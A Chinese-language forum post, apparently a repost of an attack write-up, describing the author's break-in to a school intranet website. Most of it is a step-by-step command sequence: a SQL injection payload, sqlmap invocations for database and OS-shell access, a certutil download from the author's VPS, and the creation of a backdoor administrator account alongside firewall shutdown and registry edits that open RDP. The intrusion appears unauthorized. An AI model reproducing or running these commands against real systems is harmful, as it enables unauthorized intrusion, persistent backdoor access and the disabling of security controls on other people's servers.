taibeihacker
Moderator
0x01 前言
備考的時候偶然點了進了本校內網的某個站點, 停下了複習(直接拔劍)
0x02 渗透过程
測試到注入http://url/newdetail.aspx?id=11999' or 1=1 --
直接Sqlmap一把過, 連waf都沒得(狗頭)

隨便看看
python sqlmap.py -u 'http://url/newdetail.aspx?id=119' --batch --dbs
python sqlmap.py -u 'http://url/newdetail.aspx?id=119' --batch -users

DBMSsqlserver 2005

whoami在windows中nt authority system是內置的系統管理賬戶

查看下目錄chdir

Dir c:\

OS版本Microsoft(R) Windows(R) Server 2003, Enterprise Edition

ipconfig

服務器端存在certutil等於是決定測試一下命令
vps
python -m SimpleHTTPServer 80
打一下
ping wt070h.dnslog.cn
certutil.exe -urlcache -split -f http://funny_ip/amazing1x
發現回顯

奈何網站路徑是中文的, sqlmap寫木馬的話會亂碼, 找了找解決辦法無果

看看環境變量

Nmap看看端口因為嘗試遠程連接的時候出了一些問題,起初不知道是什麼原因所以打算看看

尝试远程连接3389新建用戶
#新建用戶
net user amazingadmin123 amazing.123456 /add
#賦予權限
net localgroup Administrators amazingadmin123 /add
#激活用戶
net user amazingadmin123 /active:yes
#關閉防火牆
netsh firewall set opmode mode=disable
#開啟默認設置netsh firewall reset
通過註冊表開啟3389端口
echo Windows Registry Editor Version 5.00 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 3389.reg
echo 'fDenyTSConnections'=dword:00000000 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 3389.reg
echo 'ortNumber'=dword:00000D3D 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 3389.reg
echo 'PortNumber'=dword:00000D3D 3389.reg
regedit /s 3389.reg相關記錄

相關記錄

這個過程連續嘗試了兩三次都沒有成功,也沒找到原因,服務還關了,只能先考試等管理員開機了

考完試第三天網站上線了,再試試新建用戶……
原來是安全策略的問題,不能使用簡單地密碼,新建用戶的時候用了個複雜的密碼就行了
远程连接️

配置加載中……


0x03 总结
1.發現主頁存在一處注入點http://url/newdetail.aspx?id=11999' or 1=1 --2.通過SQLMAP進行注入,執行命令:sql-shellselect @@version; //查詢數據庫版本sql-oswhoami //發現是system權限sql-oschdir //查看目錄sql-osdir c: //列出C盤目錄sql-ossysteminfo //查看系統版本sql-osipconfig //查看系統IPsql-oscuertutil //測試是否存在cuertutil 下載命令3.在VPS搭建HTTP服務器python -m SimpleHTTPServer 804.可以將cs生成exe上傳到VPS服務器上。 5.通過NAMP掃描目標系統開放端口,發現3389存在6.創建用戶並添加到管理員權限,且啟用賬號和關閉防火功能#新建用戶sql-osnet user amazingadmin123 Admin@12$12 /add#賦予權限sql-osnet localgroup Administrators amazingadmin123 /add#激活用戶sql-osnet user amazingadmin123 /active:yes#關閉防火牆sql-osnetsh firewall set opmode mode=disable7.通過mstsc成功遠程連接原文鏈接:https://xz.aliyun.com/t/9444